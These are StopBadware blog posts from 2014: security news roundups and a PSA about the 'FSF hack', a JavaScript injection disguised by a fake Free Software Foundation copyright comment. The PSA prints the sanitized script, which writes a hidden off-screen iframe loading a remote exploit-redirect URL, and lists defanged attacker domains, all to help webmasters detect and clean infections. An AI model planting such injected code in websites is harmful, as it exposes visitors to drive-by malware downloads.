Community news and analysis: November 2014

Posted on December 12, 2014 - 13:49 by ccondon

Featured news

New open source Google tool tests web security scanners. Dubbed ‘Firing Range,’ the tool functions as a test ground for automated scanners and will help verify the detection capabilities of security tools. Details here.

Google study delves into manual account hijacking incidents: tactics used, success rates, damage done, and more.


ESET: First in-the-wild exploitation of Unicorn vulnerability affecting IE versions 3-11.

Fortinet: The rebirth of Dofoil—new malware variant marks the resurrection of an old botnet. 

Sucuri: RSS reveals malware injections.

Other security news

Sophos: Carder. su fraudster jailed for 9 years, ordered to pay $50.8 million.

Over the next few months, Chrome and Firefox are changing the way they treat certain website certificates. Specifically, SHA-1 certificates will be treated as less trustworthy. This change affects a lot of websites—see CloudFlare’s explanation here. (Google's explanation from September is here.)

Community news and analysis: September/October 2014

Posted on November 4, 2014 - 16:19 by ccondon

We’ve been extra busy at StopBadware this fall. We're organizing some cool research, we trained a fabulous new website tester (check out last week’s website PSA), and we attended a few different security conferences and meetings. Our community news roundup this week covers both September and October.

Featured news: A trio of security vulnerabilities

Shellshock: A serious security vulnerability was discovered in bash, a commonly used tool on many Unix, Linux, and Mac OS X systems. When exploited, the bug allows attackers to run arbitrary shell commands on vulnerable servers. See excellent coverage here from AutomatticSiteLockFortinet, and CloudFlare.  

POODLE: Google researchers disclosed a vulnerability in SSLv3 that can allow an attacker to access private information from within an encrypted transaction. POODLE affects any browser or site that supports SSLv3. Sites using this version of SSL should upgrade to a newer version of TLS. See our partners’ coverage of POODLE: GoogleMozillaQualysFortinet.

Highly critical security vulnerability in Drupal: We can't stress this one enough. On October 15, the Drupal team released a highly critical security advisory about a SQL injection vulnerability in the Drupal core. On October 29, Drupal published a follow-up PSA stating that automated attacks began compromising vulnerable Drupal sites as soon as the initial security advisory was released, and webmasters should assume every Drupal 7 website was compromised unless updated within seven hours of when Drupal disclosed the security flaw on October 15. Sophos and Sucuri have more details.

Malware news and analysis

ESET: Two recently patched Adobe Flash exploits now used in exploit kits, an excellent technical paper on bootkits (PDF via Virus Bulletin), another great paper on the evolution of webinject, and details on August BlackEnergy PowerPoint campaigns.

Fortinet: A look at the crypto in Android’s Emmental malware (see also Axelle Apvrille’s post on how to undermine the malware and redirect intercepted messages), a new variant of third-generation Pushdo malware, and the evolution of Tinba malware.

Sophos: A resurgence in VBA malware, what you need to know about the Sandworm zero-day malware, and a (Down Under) speed camera phish that leads to CryptoLocker-esque ransomware.

Sucuri: Manipulating WordPress plugin functions to inject malware, WordPress websites still being hacked via MailPoet plugin vulnerability, CMD process contributing to reinfection on Microsoft IIS servers.

Other security news

Google on strengthening two-step verification with Security Key: “Security Key is a physical USB second factor that only works after verifying the login site is truly a Google website.”

Mozilla on implementing a faster Content Security Policy, and why using CSP improves security for those building new websites.

'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from from very bad places. We're referring to this as the FSF hack. 

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */ function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>'); } } JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has randomly generated hex strings in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!